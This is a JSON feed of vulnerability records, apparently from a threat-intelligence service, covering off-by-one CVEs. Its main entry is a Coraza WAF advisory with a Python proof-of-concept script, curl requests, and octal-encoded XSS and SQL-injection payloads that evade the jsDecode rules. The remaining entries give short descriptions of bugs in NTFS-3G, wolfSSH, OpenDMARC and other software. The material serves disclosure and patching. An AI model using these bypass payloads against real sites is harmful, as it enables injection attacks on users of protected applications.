{"success":true,"data":{"threats":[{"id":"674d7133-282a-442f-8542-962a07bd4c05","slug":"cve-2026-104774","externalId":"GHSA-pc5q-qfxp-ggqv","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"Coraza: jsDecode Off-by-One in Octal Escape Handling Enables WAF Bypass","description":"### Summary\nThe `t:jsDecode` transformation in Coraza WAF contains an off-by-one error when parsing octal escape sequences. A backslash character was incorrectly included in the octal number buffer, causing `strconv.ParseInt` to fail for every octal escape sequence and return a null byte instead of the decoded value that would normally be returned. This will cause all JS-escaped payloads to be corrupted, thus leading to the bypassing of these WAF rules when WAF rules that rely on `jsDecode` for normalization are enabled.\n\nTherefore, a real-world attack scenario: an attacker could use JavaScript octal escape sequences (`\\ooo`) to encode attack syntax. Although the WAF cannot decode these sequences correctly, the target backend (such as a browser or application) can parse them as expected.\n\n### Details\nVulnerable code: `internal/transformations/js_decode.go:64-70.`\n```go\ncase (i+1 < inputLen) && isodigit(input[i+1]):\n    /* \\OOO (only one byte, \\000 - \\377) */\n    buf := make([]byte, 3)\n    j := 0\n\n    for (i+1+j < inputLen) && (j < 3) {\n        buf[j] = input[i+j]     // this should be `input[i+1+j]`\n        j++\n        if !isodigit(input[i+j]) {\n            break\n        }\n    }\n```\nThis is because, when entering octal mode, the loop variable `i` points to the backslash character `\\`. Before entering octal mode, the pointer **does not** cross the backslash (unlike in the `\\u` and `\\x` cases, where `i+N` is used as the index). Line 65 uses `input[i+j]`, so when `j=0`, the backslash character itself is copied to `buf[0]`. The subsequent call to `strconv.ParseInt(string(buf), 8, 8)` will fail because `\\` is not a valid octal digit; it therefore returns `0` and raises an error (which is silently suppressed by `_`), resulting in the loss of the bytes that were supposed to be decoded.\n\nFor example, Input `\\163`. The loop starts with `j=0`: `buf[0] = input[i+0] = ‘\\’ ` (the backslash itself). The counter `j` is incremented to 1. Since `isodigit(input[i+1]) = isodigit(‘1’)` is true, the loop continues. When `j=1`: `buf[1] = input[i+1] = ‘1’`. The counter increments to 2; `isodigit(input[i+2]) = isodigit(‘6’)` is true. At this point, `j = 2`: `buf[2] = input[i+2] = ‘6’`. The counter increments to 3, at which point the loop condition `j < 3` is no longer satisfied. Final buffer: `buf = [‘\\’, ‘1’, ‘6’]`. The buffer is truncated when `j = 2` (because `buf[0] = ‘\\’ > ‘3’`), leaving `[‘\\’, ‘1’]`.\n\nThis error affects all octal escape sequences (from `\\000` to `\\377`). Each sequence is decoded and displayed as `0x00` instead of the expected value. For example: `\\377` is normally decoded as `\\xff` or 255\n\n```go\n// Bug: buf = ['\\', '3', '7'] to string(buf) = \"\\\\37\"\nnn, _ = strconv.ParseInt(\"\\\\37\", 8, 8)  // nn = 0\n// Correct: buf = ['3', '7', '7'] = \"377\"\nnn, _ = strconv.ParseInt(\"377\", 8, 8)   // nn = 255 = 0xFF\n```\n\n### PoC\n#### Test Environment\nCoraza WAF v3.7.0 is configured to `127.0.0.1:8090`, `SecRuleEngine` is set to `On`, `SecRequestBodyAccess` is set to `On`, and the complete OWASP CRS rule set has been loaded.\n\n#### PoC Executable Script\n```python\n#!/usr/bin/env python3\nimport urllib.request, sys\n\nTARGET = sys.argv[1] if len(sys.argv) > 1 else \"http://127.0.0.1:8090\"\n\nnormal_url = f\"{TARGET}/?q=%3Cscript%3E\"\noctal_url = f\"{TARGET}/?q=%3C%5C163%5C143%5C162%5C151%5C160%5C164%3E\"\n\nprint(f\"[Normal XSS: {normal_url}\")\ntry:\n    urllib.request.urlopen(normal_url)\n    print(\"  Response: 200 \")\nexcept urllib.error.HTTPError as e:\n    print(f\"  Response: {e.code}\")\n\nprint(f\"\\nBypass JS octal-escaped XSS: {octal_url}\")\ntry:\n    urllib.request.urlopen(octal_url)\n    print(\"  Response: 200 (BYPASS)\")\nexcept urllib.error.HTTPError as e:\n    print(f\"  Response: {e.code}\")\n```\noutput:\n```\n  Normal XSS: http://127.0.0.1:8090/?q=%3Cscript%3E\n  Response: 403\n Bypass JS octal-escaped XSS: http://127.0.0.1:8090/?q=%3C%5C163%5C143%5C162%5C151%5C160%5C164%3E\n  Response: 200 (BYPASS)\n```\n\n#### Proof\n- Normal Test\n```bash\n curl -v -s \"http://127.0.0.1:8090/?q=%3Cscript%3E\"\n< HTTP/1.1 403 Forbidden\n< Date: Wed, 01 Jul 2026 16:09:04 GMT\n```\n- Bypass Test\n```\n curl -v -s \"http://127.0.0.1:8090/?q=%3C%5C163%5C143%5C162%5C151%5C160%5C164%3E\"\n< HTTP/1.1 200 OK\n< Date: Wed, 01 Jul 2026 16:09:04 GMT\n< Content-Length: 39\n< Hello world, transaction not disrupted.\n```\n- Log Proof\n```\n2026/07/01 16:09:04 [DEBUG] Transaction finished tx_id=\"<txid>\" is_interrupted=false\n```\n\n### Impact\nAttackers can bypass WAFs that rely on the `t:jsDecode` transformation rule, leading to cross-site scripting (XSS), SQL injection, or other malicious activities.\n#### Real-world attack scenarios:\n**SQL injection bypass.** A rule using `t:jsDecode` received `\\47\\117\\122\\40\\61\\75\\61` (i.e., `' OR 1=1`). This octal string decodes to `\\0...`, so the rule did not match the SQL injection pattern.\n\n### Affected Versions\nCoraza WAF v3.0.0 - v3.7.0\n\n### Resolution\nFixed in `internal/transformations/js_decode.go`'s `\\OOO` octal branch, plus two related issues found and fixed while verifying the patch — the actual shipped fix is broader than the single-line change originally proposed:\n\n1. **The reported off-by-one** (`buf[j] = input[i+j]` → `buf[j] = input[i+1+j]`, with the digit-continuation check updated to `input[i+1+j]` accordingly): confirmed and fixed exactly as described above.\n2. **A related high-byte clamping bug in the same branch**: the decoded value was parsed with `strconv.ParseInt(string(buf), 8, 8)` — a *signed* 8-bit parse. Octal values `\\200`-`\\377` (decimal 128-255) exceed the signed int8 range, so even after fixing the indexing bug, those high bytes would still fail to parse and clamp to `0x7f` instead of their real value. Fixed by parsing as unsigned (`strconv.ParseUint(string(buf), 8, 8)`), so the full `\\000`-`\\377` range decodes correctly.\n3. **A related overflow-saturation bug in the sibling `escapeSeqDecode` transformation** (`internal/transformations/escape_seq_decode.go`), discovered while auditing the same octal-parsing pattern elsewhere in the codebase. Unlike `jsDecode`, `escapeSeqDecode`'s indexing was already correct, but it parsed octal values with `strconv.ParseUint(input[i+1:i+j], 8, 8)` — an 8-bit-wide unsigned parse. Since up to 3 octal digits are consumed (`\\0`-`\\777`, i.e. up to decimal 511), any value above `\\377` (255) overflows 8 bits, causing `strconv.ParseUint` to return an error and a saturated value of `0xFF` for every one of those escapes, rather than correctly wrapping to its low byte (mirroring ModSecurity's `strtol(...) & 0xFF` reference behavior). Fixed by widening the parse to 16 bits (`strconv.ParseUint(input[i+1:i+j], 8, 16)`) before truncating to a byte, so `\\400`-`\\777` now wrap to their correct low-byte value instead of all saturating to `0xFF`.\n\nVerified end-to-end: both PoC payloads from this report now decode correctly —\n`<\\163\\143\\162\\151\\160\\164>` → `<script>`, and `\\47\\117\\122\\40\\61\\75\\61` → `'OR 1=1` — so a downstream WAF rule inspecting the transformed value now sees the real, intended content instead of null bytes or clamped/saturated garbage.\n\nExtensive regression tests were added covering the full octal range (including the `\\200`-`\\377` high-byte range and the `\\400`-`\\777` overflow range for `escapeSeqDecode`), the pre-existing digit-count/truncation edge cases, and both PoC payloads verbatim.\n\n### Mitigation\nUpgrade to the patched release once available. If upgrading isn't immediately possible, the specific code change is:\n\n```go\nfor (i+1+j < inputLen) && (j < 3) {\n    buf[j] = input[i+1+j]\n    j++\n    if i+1+j >= inputLen || !isodigit(input[i+1+j]) {\n        break\n    }\n}\n...\nnn, _ := strconv.ParseUint(string(buf), 8, 8)\n```\n\n### Severity (revised 2026-10-02)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N` (5.8, Medium).\n\nAttack Complexity is Low: JavaScript engines decode legacy octal escapes in non-strict string literals (ECMAScript Annex B), the standard behaviour `jsDecode` emulates, so the request alone triggers the discrepancy. The previous vector (`S:U/C:L/I:L`, 6.5) scored Confidentiality and Integrity separately for what is a single inspection bypass.\n\nImpact metrics follow the convention used across Coraza's WAF-bypass advisories: the vulnerable component is Coraza, but the impact lands on the protected application, so Scope is Changed. The bypass hides a payload from inspection; the application still has to be vulnerable to it, so Integrity is Low and Confidentiality is not scored separately.\n\n_AI involvement in this section: Claude Opus 5.5 (Anthropic), via Claude Code, re-derived the CVSS vector from the project's triage guidance (AGENTS.md, \"CVSS preconditions get verified, not copied from the report\") and drafted this text. A human maintainer (fzipi) chose the `S:C/I:L` impact convention and directed this update._","cveId":"CVE-2026-104774","cvssScore":null,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N","severity":"medium","vendor":"Go","product":"github.com/corazawaf/coraza/v3","affectedVersions":["pkg:golang/github.com/corazawaf/coraza/v3 >= 3.0.0, < 3.8.0"],"cwes":["CWE-172","CWE-193","CWE-693"],"tags":["osv","osv:ghsa-pc5q-qfxp-ggqv","ecosystem:go"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-pc5q-qfxp-ggqv","type":"advisory","title":"OSV GHSA-pc5q-qfxp-ggqv"},{"url":"https://github.com/corazawaf/coraza/security/advisories/GHSA-pc5q-qfxp-ggqv","type":"other","title":"OSV web"},{"url":"https://github.com/corazawaf/coraza/commit/f9b7afdbcedce7ad814663eaee2e342578ea3bb2","type":"other","title":"OSV web"},{"url":"https://github.com/corazawaf/coraza","type":"vendor","title":"OSV package"},{"url":"https://github.com/corazawaf/coraza/releases/tag/v3.8.0","type":"other","title":"OSV web"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T17:45:53.000Z","addedAt":"2026-10-08T18:42:41.937Z","updatedAt":"2026-10-08T18:42:41.937Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104774","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104774","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-pc5q-qfxp-ggqv"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-pc5q-qfxp-ggqv"}]},{"id":"13666092-2b6e-4831-8f17-e6ba4f9e61ab","slug":"cve-2026-42618","externalId":"CVE-2026-42618","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-42618 — In NTFS-3G before 2026.7.7, a heap buffer overflow exists in ntfs_decompress() in compress.c that allows an attacker to corrupt one byte of heap me…","description":"In NTFS-3G before 2026.7.7, a heap buffer overflow exists in ntfs_decompress() in compress.c that allows an attacker to corrupt one byte of heap memory in the SUID-root ntfs-3g binary by crafting a malicious NTFS image. The overflow is triggered by reading the special crafted file.","cveId":"CVE-2026-42618","cvssScore":7.1,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H","severity":"high","vendor":"tuxera","product":"ntfs-3g","affectedVersions":["< 2026.7.7"],"cwes":["CWE-122","CWE-193"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://github.com/tuxera/ntfs-3g/security/advisories/GHSA-6whp-3f63-97qw"],"references":[{"url":"https://github.com/tuxera/ntfs-3g/releases#release-2026.7.7","type":"advisory","title":"Release Notes"},{"url":"https://github.com/tuxera/ntfs-3g/security/advisories/GHSA-6whp-3f63-97qw","type":"patch","title":"Patch"}],"epssScore":0.00126,"epssPercentile":0.02033,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T14:17:09.740Z","addedAt":"2026-10-07T14:39:35.233Z","updatedAt":"2026-10-08T19:33:16.540Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42618","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-42618","note":"authoritative record"}]},{"id":"7924fd2a-d834-478b-a207-eeea7b2b8df2","slug":"cve-2026-83742","externalId":"CVE-2026-83742","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-83742 — Unsigned integer underflow in wstrncat() in src/port.c in wolfSSL wolfSSH from v1.4.11 through v1.5.0 on non-Windows platforms allows an authentica…","description":"Unsigned integer underflow in wstrncat() in src/port.c in wolfSSL wolfSSH from v1.4.11 through v1.5.0 on non-Windows platforms allows an authenticated remote attacker to write one out-of-bounds null byte past the end of a stack buffer by sending a crafted SFTP path. wolfSSH_RealPath() in src/ssh.c appends each path component with a remaining-size bound (outSz - curSz) rather than the full destination size, so once the accumulated path reaches half the output buffer the size_t computation n - strlen(s1) - 1 wraps to near SIZE_MAX. The strncat() call is then effectively unbounded and copies the whole component; when that component exactly fills the remainder of the buffer, its terminating null is written one byte past the end. The caller's own length check keeps the copied data inside the buffer, so the overflow is limited to that single null byte, which may corrupt an adjacent stack value and crash the process. Applications that call the public wolfSSH_RealPath() with an output buffer smaller than the input path are additionally exposed to an unbounded copy, because the word32 expression outSz - segSz in that length check also wraps.","cveId":"CVE-2026-83742","cvssScore":5.3,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-121","CWE-191","CWE-193"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/wolfSSL/wolfssh/commit/513e52b18927a4e3f7cf17ecaf107958e56139de","type":"advisory","title":"facts@wolfssl.com"},{"url":"https://github.com/wolfSSL/wolfssh/commit/822e4464560b467580ea37a2fc03b0988d88b71f","type":"advisory","title":"facts@wolfssl.com"},{"url":"https://github.com/wolfSSL/wolfssh/commit/fbc7cd88a23b59a45a584020a4c7242d9bd70f35","type":"advisory","title":"facts@wolfssl.com"},{"url":"https://github.com/wolfSSL/wolfssh/pull/1084","type":"advisory","title":"facts@wolfssl.com"}],"epssScore":0.0033,"epssPercentile":0.2408,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T03:16:59.880Z","addedAt":"2026-10-07T04:39:33.977Z","updatedAt":"2026-10-07T16:39:31.669Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-83742","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-83742","note":"authoritative record"}]},{"id":"ec4bd1d5-acf7-4b2e-b40a-32061ffb5047","slug":"cve-2026-106584","externalId":"CVE-2026-106584","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106584 — In ssh-keygen in OpenSSH before 10.6, certificates could have incorrect expiration times because of Daylight Saving mishandling.","description":"In ssh-keygen in OpenSSH before 10.6, certificates could have incorrect expiration times because of Daylight Saving mishandling. There can be a slightly more severe effect on users in certain Antarctic locations.","cveId":"CVE-2026-106584","cvssScore":2.5,"cvssVector":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N","severity":"low","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-193"],"tags":["nvd","status:received","status:awaiting-analysis","status:undergoing-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.openssh.org/releasenotes.html#10.6","type":"advisory","title":"cve@mitre.org"}],"epssScore":0.00056,"epssPercentile":0.00003,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T21:17:19.520Z","addedAt":"2026-10-06T22:39:33.099Z","updatedAt":"2026-10-07T18:39:30.627Z","epssUpdatedAt":"2026-10-07T12:00:27.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106584","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106584","note":"authoritative record"}]},{"id":"dc81dd34-159e-45dd-b080-31988c4fbf84","slug":"cve-2026-104033","externalId":"CVE-2026-104033","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-104033 — A flaw was found in SSSD.","description":"A flaw was found in SSSD. When configured to enforce account expiration using LDAP (Lightweight Directory Access Protocol) shadow attributes, SSSD fails to treat an expiration value of zero as an expired account. A user with valid credentials for an expired account can exploit this flaw to bypass access controls and authenticate to the system. This allows unauthorized access to persist after the account was intended to be deactivated.","cveId":"CVE-2026-104033","cvssScore":5.4,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-193"],"tags":["nvd","status:received","status:awaiting-analysis","status:undergoing-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-104033","type":"advisory","title":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2479271","type":"advisory","title":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}],"epssScore":0.00193,"epssPercentile":0.08237,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T01:16:34.143Z","addedAt":"2026-10-06T01:50:41.276Z","updatedAt":"2026-10-07T22:39:36.055Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104033","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104033","note":"authoritative record"}]},{"id":"40d451c1-e72d-4feb-9d92-155424e18c7f","slug":"cve-2026-101014","externalId":"CVE-2026-101014","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-101014 — A vulnerability was detected in Trusted Domain Project OpenDMARC up to 1.4.2.","description":"A vulnerability was detected in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_util_cleanup in the library libopendmarc/opendmarc_util.c of the component DMARC Record Parser. Performing a manipulation results in off-by-one. The attack may be initiated remotely. The exploit is now public and may be used. The patch is named b3b1da9264bc80324094a27c71e7369bdedc62ae. To fix this issue, it is recommended to deploy a patch.","cveId":"CVE-2026-101014","cvssScore":5.5,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-189","CWE-193"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/trusteddomainproject/OpenDMARC/commit/b3b1da9264bc80324094a27c71e7369bdedc62ae","type":"advisory","title":"cna@vuldb.com"},{"url":"https://github.com/trusteddomainproject/OpenDMARC/pull/188","type":"advisory","title":"cna@vuldb.com"},{"url":"https://github.com/trusteddomainproject/OpenDMARC/pull/344","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-101014","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/917100","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/410884","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/410884/cti","type":"advisory","title":"cna@vuldb.com"},{"url":"https://weitongli.com/share/opendmarc-cleanup-off-by-one.html","type":"advisory","title":"cna@vuldb.com"}],"epssScore":0.00314,"epssPercentile":0.22325,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-28T09:17:03.893Z","addedAt":"2026-09-28T09:50:38.738Z","updatedAt":"2026-09-28T15:50:46.413Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-101014","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-101014","note":"authoritative record"}]},{"id":"acc50666-a9b2-4853-a03a-3b1cb729496d","slug":"cve-2026-100889","externalId":"CVE-2026-100889","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-100889 — A vulnerability was detected in Trusted Domain Project OpenDKIM up to 2.11.0.","description":"A vulnerability was detected in Trusted Domain Project OpenDKIM up to 2.11.0. Affected is the function dkim_qp_decode of the file util.c of the component Decoder. The manipulation results in off-by-one. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.","cveId":"CVE-2026-100889","cvssScore":5.5,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-189","CWE-193"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://vuldb.com/cve/CVE-2026-100889","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/917063","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/410839","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/410839/cti","type":"advisory","title":"cna@vuldb.com"},{"url":"https://weitongli.com/share/opendkim-qp-off-by-one.html","type":"advisory","title":"cna@vuldb.com"}],"epssScore":0.003,"epssPercentile":0.20775,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-28T00:16:32.647Z","addedAt":"2026-09-28T01:50:37.897Z","updatedAt":"2026-09-28T15:50:46.072Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-100889","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-100889","note":"authoritative record"}]},{"id":"db1dc9b0-56e4-4046-8b42-ef9d5915353a","slug":"cve-2026-18460","externalId":"CVE-2026-18460","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-18460 — Off-by-one Error, Out-of-bounds Write vulnerability in RTI Connext Professional (Core Libraries) allows Overflow Buffers.","description":"Off-by-one Error, Out-of-bounds Write vulnerability in RTI Connext Professional (Core Libraries) allows Overflow Buffers. This issue affects Connext Professional: from 7.4.0 before 7.7.0.1, from 7.0.0 before 7.3.1.6.","cveId":"CVE-2026-18460","cvssScore":6.9,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-193","CWE-787"],"tags":["nvd","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.rti.com/vulnerabilities/#cve-2026-18460","type":"advisory","title":"3f572a00-62e2-4423-959a-7ea25eff1638"}],"epssScore":0.00253,"epssPercentile":0.15376,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-22T18:17:11.940Z","addedAt":"2026-09-22T19:50:41.629Z","updatedAt":"2026-09-22T19:50:41.629Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-18460","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-18460","note":"authoritative record"}]},{"id":"68e170db-cf48-4ee2-b88c-0478af09a8af","slug":"cve-2026-83600","externalId":"CVE-2026-83600","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-83600 — Netdata is an open source observability tool.","description":"Netdata is an open source observability tool. Prior to 2.10.4, an authenticated child agent can send an oversized CHART SLOT value that str2ull_encoded passes to pluginsd_rrdset_cache_put_to_slot in src/plugins.d/pluginsd_internals.h. The accepted slot drives reallocz to request an approximately 16 GiB chart-pointer array, and allocation failure invokes fatal and aborts the parent Netdata agent, repeatedly disabling centralized monitoring while stream access persists. This issue is fixed in version 2.10.4 and nightly build 2.10.0-782-nightly.","cveId":"CVE-2026-83600","cvssScore":6.5,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-193","CWE-400"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/netdata/netdata/commit/034a774f689ac01488fc261ca729ce0875819b1b","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/netdata/netdata/pull/22598","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/netdata/netdata/releases/tag/v2.10.4","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/netdata/netdata/security/advisories/GHSA-3mxw-fv2x-rhc6","type":"advisory","title":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}],"epssScore":0.00548,"epssPercentile":0.44157,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-22T17:17:26.103Z","addedAt":"2026-09-22T17:50:43.465Z","updatedAt":"2026-09-23T19:50:39.768Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-83600","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-83600","note":"authoritative record"}]},{"id":"50853082-32af-4a88-a577-f5b933bcfa9d","slug":"cve-2026-93018","externalId":"CVE-2026-93018","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-93018 — Imager versions before 1.036 for Perl disclose uninitialised heap memory reading a paletted image with pixel indexes past its colour map in i_gpix_…","description":"Imager versions before 1.036 for Perl disclose uninitialised heap memory reading a paletted image with pixel indexes past its colour map in i_gpix_p and i_glin_p.\n\nThe palette is allocated uninitialised, and only the entries a reader adds count as populated. The TGA reader stores pixel indexes without checking them against the colour map. i_gpix_p() rejects only an index greater than the count, so an index equal to it reads the first unpopulated entry, and getpixel() returns it.\n\ni_glin_p() skips any index at or beyond the count without writing that pixel to the caller's buffer. The palette-to-RGB conversion reads each row through an uninitialised buffer, so those pixels of the converted image hold prior heap contents.\n\nReading an attacker-supplied image through Imager->read() and then fetching its pixels or converting it to RGB discloses process heap memory.","cveId":"CVE-2026-93018","cvssScore":5.5,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-193","CWE-908"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/tonycoz/imager/commit/dcf0a52e2732399d42ab44d98af6934658d068ee.patch","type":"advisory","title":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://github.com/tonycoz/imager/security/advisories/GHSA-j7v7-cm4g-vrgf","type":"advisory","title":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://metacpan.org/release/TONYC/Imager-1.036/changes","type":"advisory","title":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"http://www.openwall.com/lists/oss-security/2026/09/18/8","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"}],"epssScore":0.00176,"epssPercentile":0.06457,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-18T14:19:04.363Z","addedAt":"2026-09-18T15:50:39.968Z","updatedAt":"2026-09-22T19:50:39.886Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/C